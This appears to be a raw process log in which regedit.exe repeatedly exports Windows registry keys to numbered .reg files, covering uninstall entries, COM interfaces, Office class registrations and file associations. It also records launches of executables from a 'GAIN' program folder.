/e "296.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\SysWOW64\regedit.exe

/e "297.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\SysWOW64\regedit.exe

/e "298.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\SysWOW64\regedit.exe

/e "299.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\SysWOW64\regedit.exe

/e "300.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\SysWOW64\regedit.exe

/e "301.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860"

C:\Windows\SysWOW64\regedit.exe

/e "302.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173"

C:\Windows\SysWOW64\regedit.exe

/e "303.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757"

C:\Windows\SysWOW64\regedit.exe

/e "304.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655"

C:\Windows\SysWOW64\regedit.exe

/e "305.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573"

C:\Windows\SysWOW64\regedit.exe

/e "306.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063"

C:\Windows\SysWOW64\regedit.exe

/e "307.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743"

C:\Windows\SysWOW64\regedit.exe

/e "308.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860"

C:\Windows\SysWOW64\regedit.exe

/e "309.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173"

C:\Windows\SysWOW64\regedit.exe

/e "310.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757"

C:\Windows\SysWOW64\regedit.exe

/e "311.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655"

C:\Windows\SysWOW64\regedit.exe

/e "312.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573"

C:\Windows\SysWOW64\regedit.exe

/e "313.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063"

C:\Windows\SysWOW64\regedit.exe

/e "314.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743"

C:\Windows\SysWOW64\regedit.exe

/e "315.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\SysWOW64\regedit.exe

/e "316.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkStoreService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "317.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkMeta\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "318.reg" "HKEY_CLASSES_ROOT\OneNote.NoteLinkContentService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "319.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesButton\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "320.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "321.reg" "HKEY_CLASSES_ROOT\OneNote.WordAddinTakeNotesButton\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "322.reg" "HKEY_CLASSES_ROOT\OneNote.PowerPointAddinTakeNotesService\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "323.reg" "HKEY_CLASSES_ROOT\OfficePriv.Application\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "324.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x86\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "325.reg" "HKEY_CLASSES_ROOT\OfficeCompatible.Application.x64\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "326.reg" "HKEY_CLASSES_ROOT\omicaut.MathInputControl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "327.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchorCollection\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "328.reg" "HKEY_CLASSES_ROOT\OneNote.NoteAnchor\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "329.reg" "HKEY_CLASSES_ROOT\OneNote.CFileConverter\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "330.reg" "HKEY_CLASSES_ROOT\read"

C:\Windows\SysWOW64\regedit.exe

/e "331.reg" "HKEY_CLASSES_ROOT\PPSLAX.SlideLibrary\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "332.reg" "HKEY_CLASSES_ROOT\PowerPivotExcelClientAddIn.NativeEntry\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "333.reg" "HKEY_CLASSES_ROOT\Udtool.UserDicManager\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "334.reg" "HKEY_CLASSES_ROOT\WinProj.Activator\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "335.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwUser\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "336.reg" "HKEY_CLASSES_ROOT\WECAPI5.FpwGroup\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "337.reg" "HKEY_CLASSES_ROOT\osf.RemoterProxy\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "338.reg" "HKEY_CLASSES_ROOT\osf.OsfAxControl\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "339.reg" "HKEY_CLASSES_ROOT\OSE.Global\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "340.reg" "HKEY_CLASSES_ROOT\osf.Sandbox\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "341.reg" "HKEY_CLASSES_ROOT\OWS.PostData\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "342.reg" "HKEY_CLASSES_ROOT\otkloadr.WRLoader\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "343.reg" "HKEY_CLASSES_ROOT\osf.SandboxContext\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "344.reg" "HKEY_CLASSES_ROOT\IMContact.IMContactRecognizer\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "345.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "346.reg" "HKEY_CLASSES_ROOT\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "347.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "348.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "349.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "350.reg" "HKEY_CLASSES_ROOT\Interface\{F57B7ED0-D8AB-11D1-85DF-00C04F98F42C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "351.reg" "HKEY_CLASSES_ROOT\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "352.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid"

C:\PROGRA~2\GAIN\fsg.exe

"C:\PROGRA~2\GAIN\fsg.exe"

\??\c:\program files (x86)\gain\fsg_4201.exe

"c:\program files (x86)\gain\fsg_4201.exe"

C:\Windows\SysWOW64\regedit.exe

/e "353.reg" "HKEY_CLASSES_ROOT\Interface\{EF189461-5D62-4626-8E57-FF83583C4826}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "354.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00921-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "355.reg" "HKEY_CLASSES_ROOT\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "356.reg" "HKEY_CLASSES_ROOT\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "357.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "358.reg" "HKEY_CLASSES_ROOT\Interface\{EFC9437E-3A57-487C-8471-9151D2FC1832}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "359.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "360.reg" "HKEY_CLASSES_ROOT\Interface\{FCFB3D2B-A0FA-1068-A738-08002B3371B5}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "361.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "362.reg" "HKEY_CLASSES_ROOT\Interface\{FD37FE32-82BC-4A25-B056-315F4DBB194D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "363.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\dfshim.dll"

C:\Windows\SysWOW64\regedit.exe

/e "364.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe"

C:\Windows\SysWOW64\regedit.exe

/e "365.reg" "HKEY_CLASSES_ROOT\Interface\{FEA77364-DF95-4A23-A905-019B79A8E481}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "366.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "367.reg" "HKEY_CLASSES_ROOT\Interface\{F9F2FE81-F764-4BD0-AFA5-5DE841DDB625}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "368.reg" "HKEY_CLASSES_ROOT\Interface\{F7F76FFB-E829-4360-9E57-F69C27FBA08A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "369.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "370.reg" "HKEY_CLASSES_ROOT\Interface\{FC30CDDE-9AD1-455D-A1BE-4B0D90ECEC92}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "371.reg" "HKEY_CLASSES_ROOT\Interface\{FB476970-9BAB-4861-811E-3E98B0C5ADDF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "372.reg" "HKEY_CLASSES_ROOT\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "373.reg" "HKEY_CLASSES_ROOT\Interface\{EEE0091C-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "374.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "375.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "376.reg" "HKEY_CLASSES_ROOT\Interface\{E790E1D1-9DE8-4853-8AC6-933D4FD9C927}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "377.reg" "HKEY_CLASSES_ROOT\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "378.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "379.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "380.reg" "HKEY_CLASSES_ROOT\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "381.reg" "HKEY_CLASSES_ROOT\Interface\{DF48072F-5EF8-434E-9B40-E2F3AE759B5F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "382.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B64-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "383.reg" "HKEY_CLASSES_ROOT\Interface\{DA936B62-AC8B-11D1-B6E5-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "384.reg" "HKEY_CLASSES_ROOT\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "385.reg" "HKEY_CLASSES_ROOT\Interface\{E480B861-4708-4E6D-A5B4-A2B4EEB9BAA4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "386.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "387.reg" "HKEY_CLASSES_ROOT\Interface\{E43FD401-8715-11D1-98E7-00A0C9702442}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "388.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "389.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "390.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C5-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "391.reg" "HKEY_CLASSES_ROOT\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "392.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00919-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "393.reg" "HKEY_CLASSES_ROOT\Interface\{EEE00915-E393-11D1-BB03-00C04FB6C4A6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "394.reg" "HKEY_CLASSES_ROOT\Interface\{EE5A151A-AD2A-4CEE-AD65-228B59F5B4AD}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "395.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "396.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C2-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "397.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C1-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "398.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "399.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "400.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C4-4442-11D1-8906-00A0C9110049}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "401.reg" "HKEY_CLASSES_ROOT\Interface\{EB41E8C3-4442-11D1-8906-00A0C9110049}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "402.reg" "HKEY_CLASSES_ROOT\EntityPicker.EntityPicker\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "403.reg" "HKEY_CLASSES_ROOT\EntityDataProvider.EntityDataProvider\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "404.reg" "HKEY_CLASSES_ROOT\EntityDataHandler.EntityDataHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "405.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage1\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "406.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.PowerMapConnect\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "407.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.MapEdp\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "408.reg" "HKEY_CLASSES_ROOT\EntityPicker.PropPage2\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "409.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "410.reg" "HKEY_CLASSES_ROOT\.zoo"

C:\Windows\SysWOW64\regedit.exe

/e "411.reg" "HKEY_CLASSES_ROOT\.xps"

C:\Windows\SysWOW64\regedit.exe

/e "412.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.AroAxControlShim\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "413.reg" "HKEY_CLASSES_ROOT\bingmaps"

C:\Windows\SysWOW64\regedit.exe

/e "414.reg" "HKEY_CLASSES_ROOT\BannerNotificationHandler.BannerNotificationHandler\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "415.reg" "HKEY_CLASSES_ROOT\AdHocReportingExcelClientLib.BusinessBarActiveX\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "416.reg" "HKEY_CLASSES_ROOT\HxDS.HxSession\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "417.reg" "HKEY_CLASSES_ROOT\HxDs.HxRegistryWalker\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "418.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterSession\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "419.reg" "HKEY_CLASSES_ROOT\Ietag.EvtSink\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "420.reg" "HKEY_CLASSES_ROOT\IMContact.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "421.reg" "HKEY_CLASSES_ROOT\Ietag.OOC\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "422.reg" "HKEY_CLASSES_ROOT\Ietag.Factory\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "423.reg" "HKEY_CLASSES_ROOT\FDate.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "424.reg" "HKEY_CLASSES_ROOT\FBiblio.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "425.reg" "HKEY_CLASSES_ROOT\ExcelPlugInShell.VisualizationLogger\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "426.reg" "HKEY_CLASSES_ROOT\FPerson.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "427.reg" "HKEY_CLASSES_ROOT\HxDS.HxRegisterProtocol\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "428.reg" "HKEY_CLASSES_ROOT\FStock.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "429.reg" "HKEY_CLASSES_ROOT\FPlace.Factoid\CurVer"

C:\Windows\SysWOW64\regedit.exe

/e "430.reg" "HKEY_CLASSES_ROOT\.wsb"

C:\Windows\SysWOW64\regedit.exe

/e "431.reg" "HKEY_CLASSES_ROOT\.bz2"

C:\Windows\SysWOW64\regedit.exe

/e "432.reg" "HKEY_CLASSES_ROOT\.arj"

C:\Windows\SysWOW64\regedit.exe

/e "433.reg" "HKEY_CLASSES_ROOT\.arc"

C:\Windows\SysWOW64\regedit.exe

/e "434.reg" "HKEY_CLASSES_ROOT\.bzip2"

C:\Windows\SysWOW64\regedit.exe

/e "435.reg" "HKEY_CLASSES_ROOT\.dctx"

C:\Windows\SysWOW64\regedit.exe

/e "436.reg" "HKEY_CLASSES_ROOT\.dat"

C:\Windows\SysWOW64\regedit.exe

/e "437.reg" "HKEY_CLASSES_ROOT\.chm"

C:\Windows\SysWOW64\regedit.exe

/e "438.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MsoHtmEd.exe"

C:\Windows\SysWOW64\regedit.exe

/e "439.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"

C:\Windows\SysWOW64\regedit.exe

/e "440.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\fsquirt.exe"

C:\Windows\SysWOW64\regedit.exe

/e "441.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\setup.exe"

C:\Windows\SysWOW64\regedit.exe

/e "442.reg" "HKEY_CLASSES_ROOT\.7z"

C:\Windows\SysWOW64\regedit.exe

/e "443.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vstoee.dll"

C:\Windows\SysWOW64\regedit.exe

/e "444.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\table30.exe"

C:\Windows\SysWOW64\regedit.exe

/e "445.reg" "HKEY_CLASSES_ROOT\.nls"

C:\Windows\SysWOW64\regedit.exe

/e "446.reg" "HKEY_CLASSES_ROOT\.lzh"

C:\Windows\SysWOW64\regedit.exe

/e "447.reg" "HKEY_CLASSES_ROOT\.jod"

C:\Windows\SysWOW64\regedit.exe

/e "448.reg" "HKEY_CLASSES_ROOT\.oxps"

C:\Windows\SysWOW64\regedit.exe

/e "449.reg" "HKEY_CLASSES_ROOT\.stl"

C:\Windows\SysWOW64\regedit.exe

/e "450.reg" "HKEY_CLASSES_ROOT\.rar"

C:\Windows\SysWOW64\regedit.exe

/e "451.reg" "HKEY_CLASSES_ROOT\.ply"

C:\Windows\SysWOW64\regedit.exe

/e "452.reg" "HKEY_CLASSES_ROOT\.exc"

C:\Windows\SysWOW64\regedit.exe

/e "453.reg" "HKEY_CLASSES_ROOT\.dsn"

C:\Windows\SysWOW64\regedit.exe

/e "454.reg" "HKEY_CLASSES_ROOT\.dctxc"

C:\Windows\SysWOW64\regedit.exe

/e "455.reg" "HKEY_CLASSES_ROOT\.fbx"

C:\Windows\SysWOW64\regedit.exe

/e "456.reg" "HKEY_CLASSES_ROOT\.imesx"

C:\Windows\SysWOW64\regedit.exe

/e "457.reg" "HKEY_CLASSES_ROOT\.gltf"

C:\Windows\SysWOW64\regedit.exe

/e "458.reg" "HKEY_CLASSES_ROOT\.glb"

C:\Windows\SysWOW64\regedit.exe

/e "459.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "460.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "461.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "462.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "463.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A7-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "464.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A6-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "465.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "466.reg" "HKEY_CLASSES_ROOT\Interface\{000C0397-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "467.reg" "HKEY_CLASSES_ROOT\Interface\{000C0396-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "468.reg" "HKEY_CLASSES_ROOT\Interface\{000C0395-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "469.reg" "HKEY_CLASSES_ROOT\Interface\{000C0398-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "470.reg" "HKEY_CLASSES_ROOT\Interface\{000C03A0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "471.reg" "HKEY_CLASSES_ROOT\Interface\{000C039A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "472.reg" "HKEY_CLASSES_ROOT\Interface\{000C0399-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "473.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "474.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "475.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BF-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "476.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "477.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "478.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "479.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "480.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BA-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "481.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B9-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "482.reg" "HKEY_CLASSES_ROOT\Interface\{000C03B2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "483.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BB-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

